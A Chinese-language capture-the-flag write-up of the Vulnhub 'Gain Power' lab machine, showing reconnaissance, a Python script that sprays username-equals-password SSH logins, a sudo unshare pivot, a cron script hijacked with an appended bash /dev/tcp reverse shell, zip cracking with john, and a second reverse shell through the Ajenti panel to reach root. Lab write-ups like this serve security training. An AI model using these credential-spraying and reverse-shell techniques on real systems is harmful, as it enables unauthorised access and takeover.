Vulnhub之Gain Power靶机详细测试过程

这篇具有很好参考价值的文章主要介绍了Vulnhub之Gain Power靶机详细测试过程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Gain Power

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24

Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:a1:99:30      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:57:a3:c2      1      60  PCS Systemtechnik GmbH        

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 09:14 EDT
Nmap scan report for bogon (192.168.56.254)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 88416111e11f187dd60c38292579162c (RSA)
|   256 18c5fdcecd2b92f8d9171721249d67df (ECDSA)
|_  256 84c514e4e93321416a9272b9a7331aea (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS))
|_http-title: Watch shop | eCommers
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti
MAC Address: 08:00:27:57:A3:C2 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds

NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ nikto -h http://192.168.56.254/ 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-05-01 09:17:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-05-01 09:18:38 (GMT-4) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto工具扫描出目录/secret,访问该目录,将该目录下的图片文件下载到Kali Linux本地进行分析。

但是图片分析没有得到任何有意的结果。

└─$ ssh root@192.168.56.254                                        
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:1yR5iTL+oNBeYI7ACvh1p8CYWHrzXAiOC+CSijIO9uQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  


I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS

root@192.168.56.254's password: 

假设用户名为employee1,根据作者提示,可能密码与用户名有一定规律,比如跟用户名相同

从home家目录来看有coworker, helper,以及employee,而只有其中一个employee有sudo 权限,因此需要编写脚本找出哪个employee有sudo 权限

import paramiko
import sys
import time

class GainPowerCls:
    def __init__(self) -> None:
        self.host = '192.168.56.254'   # IP address of the virtual machine(target) 
        print("Target: %s" % self.host)
        try:         
            self.ssh_client = paramiko.SSHClient()
            self.ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())            

        except Exception as e:
            print("Something is wrong: %s" % e)
            sys.exit()


    def run_sudo(self,username, password):
        try:
            print('Attempt to access by %s: %s' % (username, password))
            self.ssh_client.connect(hostname=self.host,username=username, password=password)
            transport = self.ssh_client.get_transport()
            # Return the underlying .Transport object for this SSH connection. This can be used to perform lower-level tasks, like opening specific kinds of channels.
            session = transport.open_session()
            # Request a new channel to the server, of type "session". This is just an alias for calling open_channel with an argument of "session"
            session.set_combine_stderr(True)
            # Set whether stderr should be combined into stdout on this channel. The default is False, but in some cases it may be convenient to have both streams combined.
            session.get_pty()
            #Request a pseudo-terminal from the server. This is usually used right after creating a client channel, to ask the server to provide some basic terminal semantics for a shell invoked with invoke_shell. It isn't necessary (or desirable) to call this method if you're going to execute a single command with exec_command.
            session.exec_command('sudo -l')
            stdin = session.makefile('wb',-1)
            stdout = session.makefile('rb',-1)
            stdin.write(password+'\n')
            stdin.flush()
            print(stdout.read().decode('utf-8'))
            session.close()
            self.ssh_client.close()
        except Exception as e:
            print(e)
            sys.exit()

    def run(self):
        for i in range(1,101):
            username = 'employee' + str(i)
            password = 'employee' + str(i)
            self.run_sudo(username, password)
            print('*'*150)
            time.sleep(1)

if __name__ == '__main__':
    client = GainPowerCls()
    client.run()

运行上述python脚本可知employee64拥有sudo 权限

employee64
[sudo] password for employee64: 
Matching Defaults entries for employee64 on localhost:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User employee64 may run the following commands on localhost:
    (programmer) /usr/bin/unshare

******************************************************************************************************************************************************
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ ssh employee64@192.168.56.254
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  


I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS

employee64@192.168.56.254's password: 
Permission denied, please try again.
employee64@192.168.56.254's password: 
Last failed login: Mon May  1 22:34:48 EDT 2023 from 192.168.56.206 on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Mon May  1 22:30:52 2023 from 192.168.56.206
[employee64@localhost ~]$ id
uid=1063(employee64) gid=1063(employee64) groups=1063(employee64) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

通过unshare执行不同的命名空间的bash从而得到programmer的shell

[employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash
[sudo] password for employee64: 
bash-4.2$ id
uid=1182(programmer) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-4.2$ 

这样我们就得到了programmer的shell

bash-4.2$ pwd
/media/programmer/scripts
bash-4.2$ cat backup.sh 
#!/bin/bash
cp /var/www/html/thisiscarddetails.txt /tmp/back.txt

在/media/programmer/scripts有脚本,会被定期执行

将pspy64工具上传至目标主机的/tmp目录

bash-4.2$ cd /tmp
bash-4.2$ wget http://192.168.56.206:8000/pspy64
--2023-05-01 22:42:29--  http://192.168.56.206:8000/pspy64
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

100%[====================================================================================>] 3,104,768   --.-K/s   in 0.01s   

2023-05-01 22:42:29 (235 MB/s) - ‘pspy64’ saved [3104768/3104768]

bash-4.2$ chmod +x pspy64 
2023/05/01 22:44:01 CMD: UID=1183  PID=25118  | /bin/bash /media/programmer/scripts/backup.sh

可知backup.sh会被UID为1183的用户定期执行

查看/etc/passwd文件可知UID为1183的用户为vanshal

bash-4.2$ ls -alh
total 4.0K
drwxr-xr-x. 2 programmer prome 23 May 18  2020 .
drwxrwx---. 3 programmer prome 21 Aug  8  2019 ..
-rwxr-xr-x. 1 programmer prome 65 May 18  2020 backup.sh

programmer用户对backup.sh脚本有修改权限

bash-4.2$ echo 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1' >> backup.sh 
──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 51130
bash: no job control in this shell
[vanshal@localhost ~]$ id
id
uid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
You have mail in /var/mail/vanshal

稍微等会就可以得到vanshal的shell

[vanshal@localhost ~]$ cat loc
cat local.txt 

                ░██████╗░░█████╗░██╗███╗░░██╗  ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
                ██╔════╝░██╔══██╗██║████╗░██║  ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
                ██║░░██╗░███████║██║██╔██╗██║  ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
                ██║░░╚██╗██╔══██║██║██║╚████║  ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
                ╚██████╔╝██║░░██║██║██║░╚███║  ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
                ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝  ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝


                   You successfully owned the user of this box :-) Best of Luck for the root 


flag: 5c2a29d7b95868da9e503502f301e8dd

Twitter : VanshalG

得到了用户flag

家目录下有文件secret.zip,将其下载到Kali Linux本地

──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ wget http://192.168.56.254:9999/secret.zip
--2023-05-01 22:52:19--  http://192.168.56.254:9999/secret.zip
Connecting to 192.168.56.254:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 439 [application/zip]
Saving to: ‘secret.zip’

secret.zip                      100%[=====================================================>]     439  --.-KB/s    in 0s      

2023-05-01 22:52:19 (1.52 MB/s) - ‘secret.zip’ saved [439/439]
──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ unzip secret.zip    
Archive:  secret.zip
[secret.zip] Mypasswords.txt password:                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ zip2john secret.zip > secret_hash
ver 2.0 efh 5455 efh 7875 secret.zip/Mypasswords.txt PKZIP Encr: TS_chk, cmplen=243, decmplen=257, crc=BC7A971B ts=7F46 cs=7f46 type=8

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
81237900         (secret.zip/Mypasswords.txt)     
1g 0:00:00:00 DONE (2023-05-01 22:53) 6.250g/s 4480Kp/s 4480Kc/s 4480KC/s AnThOnY..741210
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

破解得到了文件的密码

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ unzip secret.zip
Archive:  secret.zip
[secret.zip] Mypasswords.txt password: 
  inflating: Mypasswords.txt         

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ cat Mypasswords.txt               
aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyKhf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6Uzd%ed8Ux_vMX=pCB

用上述密码可以成功访问8000端口,用户名为root

有webshell,可以运行任何命令文章来源地址https://www.toymoban.com/news/detail-431723.html

bash -i >& /dev/tcp/192.168.56.206/8888 0>&1
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nc -nlvp 8888                                         
[sudo] password for kali: 
listening on [any] 8888 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 45550
[root@localhost /]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[root@localhost /]# cd /root
cd /root
[root@localhost root]# ls -alh
ls -alh
total 28K
dr-xr-x---.  3 root root  132 Jun 21  2020 .
dr-xr-xr-x. 18 root root  240 Aug  7  2019 ..
-rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout
-rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile
-rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc
-rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc
drwxr-----.  3 root root   19 Aug  7  2019 .pki
-rw-r--r--.  1 root root 2.1K May 18  2020 proof.txt
-rw-------.  1 root root 1.0K Aug  7  2019 .rnd
-rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc
[root@localhost root]# cat proof.txt
cat proof.txt

        ░██████╗░░█████╗░██╗███╗░░██╗  ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░
        ██╔════╝░██╔══██╗██║████╗░██║  ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗
        ██║░░██╗░███████║██║██╔██╗██║  ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝
        ██║░░╚██╗██╔══██║██║██║╚████║  ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗
        ╚██████╔╝██║░░██║██║██║░╚███║  ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║
        ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝  ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝

_________                                     __        .__          __  .__               
\_   ___ \  ____   ____    ________________ _/  |_ __ __|  | _____ _/  |_|__| ____   ____  
/    \  \/ /  _ \ /    \  / ___\_  __ \__  \\   __\  |  \  | \__  \\   __\  |/  _ \ /    \ 
\     \___(  <_> )   |  \/ /_/  >  | \// __ \|  | |  |  /  |__/ __ \|  | |  (  <_> )   |  \
 \______  /\____/|___|  /\___  /|__|  (____  /__| |____/|____(____  /__| |__|\____/|___|  /
        \/            \//_____/            \/                     \/                    \/ 


You successfully owned the root of this box :-)

Flag: eb2e174c3883ff6b5fd871167795b4d6

Twitter : VanshalG
[root@localhost root]# 

到了这里,关于Vulnhub之Gain Power靶机详细测试过程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub之GreenOptics靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http) 说明需要添加主机记录到/etc/hosts文件: 再次访问: 返回页面为用户登录界面,10000端口的信息收集暂时告一段落。 nikto没有得到

    2024年02月01日
    浏览(40)
  • Vulnhub之Funbox 1靶机详细测试过程

    作者:jason_huawen 名称:Funbox: 1 地址: 利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164 NMAP扫描结果表明目标主机有4个开放端口:21(FTP)、22(SSH)、80(HTTP)、33060(Mysqlx?) 目标主机不允许匿名访问; FTP服务软件维ProFTDd,但版本未知 Kali Linux上浏览器访问

    2024年02月03日
    浏览(36)
  • Vulnhub之HF 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(43)
  • Vulnhub之Grotesque3靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.156 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) 浏览器访问80端口,返回页面图片中有提示md5? 可能指的是目录字典需要md5加密? 然后去掉每行结果的\\\'-\\\' 然后删除空格: 利用gobuster工具发现了文件 但是

    2023年04月27日
    浏览(36)
  • Vulnhub之Inplainsight靶机详细测试过程及经验教训

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http) 用户:mike, joe 可能有backdoor文件 目标站点是wordpress? Gobuster工具识别出目录/wordpress,访问该目录,发现页面显示不完整,查看页面源代码,可知需

    2023年04月16日
    浏览(43)
  • Vulnhub之KB Vuln 3靶机详细测试过程

    作者:jason huawen 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254 NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、80(http)、139/445(samba) 通过smbclient工具连接目标主机的smb服务,将共享目录中的文件下载到Kali Linux。 enum4linux工具识别出目标主机存在用户名heisenbe

    2023年04月12日
    浏览(43)
  • Vulnhub之Harrison靶机详细测试过程(提权成功)

    作者:jason huawen 名称: SP: harrison 地址: 利用Kali LInux的netdiscover工具识别目标主机的IP地址为192.168.56.125 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、445(samba) enum4linux识别出用户名harrison 没那么容易? 虽然得到了shell,但是这是受限的shell 用-t选项指定不同的shell没能逃脱

    2023年04月23日
    浏览(38)
  • Vulnhub之Hacker Fest 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(40)
  • Vulnhub之KB Vuln Final靶机详细测试过程

    作者: jason huawen 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.184 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http),并且nmap扫描结果可知目标主机站点有.git/目录。 Gosuter工具发现了/sites目录 浏览器访问80端口,访问/sites目录,并逐级进入下一层目录,

    2023年04月12日
    浏览(35)
  • Vulnhub之Gears of War靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 smb服务不允许上传文件 将共享目录的文件下载到Kali Linux到本地 利用enum4linux工具识别目标主机存在marcus用户 john没有破解出来。 SOS.txt文件中的[@%%,],是密码的表达式吗?可用crunch产生字典 这样就根据作者提示的

    2024年02月02日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包